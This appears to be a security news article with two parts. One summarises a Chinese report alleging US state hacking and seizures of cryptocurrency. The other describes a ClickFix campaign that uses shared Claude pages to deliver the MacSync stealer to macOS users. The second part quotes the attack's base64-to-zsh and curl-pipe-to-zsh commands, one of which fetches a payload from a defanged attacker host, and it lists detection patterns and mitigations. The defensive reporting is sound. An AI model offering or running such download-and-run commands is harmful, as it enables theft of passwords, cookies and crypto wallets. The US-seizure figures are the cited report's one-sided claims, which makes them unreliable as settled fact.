US Cyber Ops and AI‑Driven ClickFix Attacks: Seizing Crypto Assets and Targeting macOS Users

US‑led Global Virtual‑Currency Asset Seizure

According to a joint report by China’s National Computer Virus Emergency Response Center, the National Engineering Laboratory for Computer Virus Prevention, and 360 Digital Security Group, the total cryptocurrency market was valued at approximately $2.73 trillion at the end of January 2026, with Bitcoin accounting for $1.57 trillion (about 47 % of world official gold reserves). The report states that between 2022 and 2025 the United States seized more than $300 billion of virtual‑currency assets worldwide.

The U.S. employs a three‑pronged system—technical advantage, law‑binding regulations, and institutional execution—to conduct network attacks, regulatory blockades, targeted harvests, and offshore captures. From 2023 to 2025, U.S. government‑backed hacker groups launched directed attacks against more than 20 major cryptocurrency exchanges across Asia, Europe and Africa. Tactics included backdoor implantation, spear‑phishing, and supply‑chain infiltration, with the primary goal of stealing users’ wallet private keys, transaction logs and compliance data. Timeline analysis shows several operations coincided with actions by the U.S. Department of Justice and OFAC, suggesting coordinated enforcement.

The underlying motive is described as reinforcing U.S. economic hegemony and the dominance of the dollar. Confiscated assets are auctioned; the FBI’s seizure of Silk Road bitcoins generated over $10 billion in proceeds, most of which entered federal revenue. DOJ data cited in the report indicate that annual enforcement in the virtual‑asset space adds hundreds of billions of dollars to the Treasury and further entrenches global reliance on the dollar.

ClickFix Attack Using Anthropic’s Claude Platform

Security researchers identified a new threat vector in which attackers abuse Anthropic’s Claude to lure macOS users into executing malicious terminal commands. Malicious Claude tutorial pages have recorded more than 15,600 views.

Attack Chain

SEO poisoning – Attackers purchase Google ads targeting keywords such as “online DNS resolver”, “macOS command‑line disk‑space analysis tool”, and “HomeBrew”.

Redirect to Claude content – Search results lead users to either publicly shared Claude “tutorials” or a forged Apple support page hosted on Medium.

Command lure – The pages display a message such as “To fix the issue, run the following command in Terminal…”. Two command variants observed:

echo "..." | base64 -D | zsh

true && curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh

Execution downloads the MacSync information‑stealing trojan.

MacSync Trojan Capabilities

Keychain theft : extracts all passwords stored in the macOS keychain.

Browser data theft : steals passwords, cookies and history from Safari, Chrome and other browsers.

Crypto‑wallet theft : targets wallets such as MetaMask.

Screen recording : captures the user’s screen.

Audio capture : records ambient conversation via the microphone.

Command‑and‑control : communicates with C2 server a2abotnet[.]com.

Stealth Features

Hard‑coded token disguises traffic as normal.

Uses AppleScript for data exfiltration.

Retries upload up to eight times on failure.

Cleans traces after successful upload.

Scale and Impact

Malicious Claude tutorial pages have received >15,600 views, with numbers still rising.

Primary victims are high‑value macOS users—corporate executives, developers, designers and cryptocurrency investors—who typically hold larger account balances.

Why Victims Fall for the Attack

Trust in AI platforms leads users to assume Claude‑generated content is reliable.

Blind obedience to “tutorial” instructions.

Lack of understanding of base64 decoding and piped command execution.

Detection Indicators

Presence of base64 -D (decodes and executes hidden payload).

Patterns like curl … | bash/zsh (download‑and‑run).

Requests to copy unknown code into Terminal.

Claims of “fixing system issues” or “installing required components”.

Mitigation Guidance for macOS Users

Never run commands that are not fully understood, especially those involving pipelines.

Ask the AI for a safety check on any suggested command.

Download software only from official sources.

Keep Gatekeeper enabled and avoid bypassing security warnings.

Regularly audit the keychain for suspicious entries.

Enterprise‑Level Defenses

Monitor terminal command execution, focusing on base64 decoding and curl pipelines.

Deploy EDR solutions to detect known MacSync indicators.

Restrict user privileges to prevent routine admin‑level operations.

Conduct security awareness training emphasizing tutorial‑style social engineering.

Platform Responsibility

Claude content is user‑generated; pre‑moderation of all submissions is infeasible.

Anthropic has added a disclaimer that content is user‑generated and unverified.

Improved anomaly‑detection mechanisms are needed.

Similar AI‑enabled attacks have been observed with ChatGPT (distribution of the AMOS trojan) and Grok (malware propagation), indicating that AI content platforms are becoming fertile ground for malicious software distribution.

Conclusion

The ClickFix attack demonstrates that AI‑generated tutorials can lower the barrier for delivering malicious payloads. macOS terminals remain the highest‑privilege entry point, and any “tutorial” that asks users to paste commands should be treated with extreme caution.